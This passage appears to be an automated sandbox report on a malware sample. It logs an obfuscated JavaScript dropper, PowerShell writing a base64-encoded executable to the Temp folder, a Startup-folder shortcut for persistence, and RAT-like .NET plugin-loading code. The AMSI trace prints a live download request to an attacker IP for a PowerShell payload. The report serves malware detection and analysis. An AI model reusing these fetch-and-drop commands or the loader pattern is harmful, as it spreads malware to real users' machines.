            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
            Source: X1Client.lnk.12.drLNK file: ..\..\..\..\..\..\Local\Temp\X1Client.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000000.1314968452.0000000000752000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.dr, X1Client.exe.12.dr
            Source: Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000000.1314968452.0000000000752000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.dr, X1Client.exe.12.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:1094 o: f:CreateTextFile a0:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22 a1:true");IFileSystem3.CreateTextFile("C:\Temp\WTRTRWFSHS.ps1", "true");IFileSystem3._00000000();ITextStream._00000000();ITextStream.WriteLine(" exit:1094 o: f:CreateTextFile r:");ITextStream.WriteLine(" entry:1118 f:n a0:276 a1:%22c%25VU%22");ITextStream.WriteLine(" exit:1118 f:n r:%22ResponseText%22");IServerXMLHTTPRequest2.responseText();ITextStream._00000000();ITextStream.WriteLine(" entry:1109 o: f:Write a0:%22%24QAADCCDGDHFTRR%3D%5BIO.Path%5D%3A%3ACombine(%24env%3ATEMP%2C%22JXCJKXCJHKJHXCJHKXCXCJHK.exe%22)%0D%0A%5BIO.File%5D%3A%3AWriteAllBytes(%24QAADCCDGDHFTRR%2C%5BConvert%5D%3A%3AFromBase64String(%22");ITextStream.Write("$QAADCCDGDHFTRR=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")[IO.File]::WriteAllBytes($QAADCCDGDHFTRR,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg");ITextStream._00000000();ITextStream.WriteLine(" exit:1109 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1127 f:n a0:278 a1:%2211*M%22");ITextStream.WriteLine(" exit:1127 f:n r:%22Close%22");ITextStream._00000000();ITextStream.WriteLine(" entry:1123 o: f:Close");ITextStream.Close();ITextStream.WriteLine(" exit:1061 f:m r:%22Open%22");ITextStream.WriteLine(" entry:1066 f:m a0:293");ITextStream.WriteLine(" exec:719 f:b");ITextStream.WriteLine(" entry:724 f:a");ITextStream.WriteLine(" exit:724 f:a r:v1nJCMLWDc5tAgvSBa%2CW4lcNCkxW64ngmoZwCkcW6lcVaa%2Crg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa%2CrxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU%2CACkUdHfzeGlcS3ldImorW4fbBa%2Cr8o2W69AWQulW7tdG8k%2BWQnGW7ipf8");ITextStream.WriteLine(" entry:957 f:b a0:293 a1:undefined");ITextStream.WriteLine(" exec:731 f:");ITextStream.WriteLine(" entry:941 o:function%20(f%2C%20g) f:VpnTcu a0:%22r0vu%22");ITextStream.WriteLine(" exec:759 f:");ITextStream.WriteLine(" entry:893 f:decodeURIComponent a0:%22%2547%2545%2554%22");ITextStream.WriteLine(" exit:893 f:decodeURIComponent r:%22GET%22");ITextStream.WriteLine(" exit:941 o:function%20(f%2C%20g) f:VpnTcu r:%22GET%22");ITextStream.WriteLine(" exit:957 f:b r:%22GET%22");ITextStream.WriteLine(" exit:1066 f:m r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1057 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2FBRAINNN.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/BRAINNN.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:1057 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1073 o: f:Send");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:1073 o: f:Send r:undefined");ITextStream.WriteLine(" entry:1086 f:m a0:281");ITextStream.WriteLine(" exit:1086 f:m r:%22Status%22");IServerXMLHTTPRequest2.status();ITextStream.WriteLine(" entry:1098 f:m a0:302"
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Messages.cs.Net Code: Memory
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAN
            Source: obfuscated (1).jsInitial file: High amount of function use 7
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: 0xE04E89D4 [Sat Apr 2 01:24:36 2089 UTC]
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: section name: 3YZ&:\O
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: section name:
            Source: X1Client.exe.12.drStatic PE information: section name: 3YZ&:\O
            Source: X1Client.exe.12.drStatic PE information: section name:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC3C930962 push E95B7BD0h; ret 8_2_00007FFC3C9309C9
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06893 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D03E85 push ecx; ret 12_2_06D03EFC
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06CA0 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07C38 push esi; iretd 12_2_06D07C3A
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D0059F pushfd ; iretd 12_2_06D005A1
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06AE3 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06A53 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D0721D push ecx; iretd 12_2_06D0721E
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07A07 push esp; iretd 12_2_06D07A0A
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07BDF push ebp; iretd 12_2_06D07BE2
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D073F0 push edx; iretd 12_2_06D073F2
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06B69 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07B19 push ebp; iretd 12_2_06D07B1A
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07B1B push ebp; iretd 12_2_06D07B22
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07B00 push ebp; iretd 12_2_06D07B02
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07B03 push ebp; iretd 12_2_06D07B0A
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06B32 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D070D1 push ecx; iretd 12_2_06D070D2
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D048E8 push 4006CF36h; iretd 12_2_06D048ED
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07039 push ecx; iretd 12_2_06D0703A
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D069C1 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D079C8 push esp; iretd 12_2_06D079CA
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D079CB push esp; iretd 12_2_06D079D2
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D06968 push eax; iretd 12_2_06D06D96
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D0692F push eax; iretd 12_2_06D06D96
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: section name: 3YZ&:\O entropy: 7.976150909693182
            Source: X1Client.exe.12.drStatic PE information: section name: 3YZ&:\O entropy: 7.976150909693182
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile created: C:\Users\user\AppData\Local\Temp\X1Client.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1Client.lnkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1Client.lnkJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
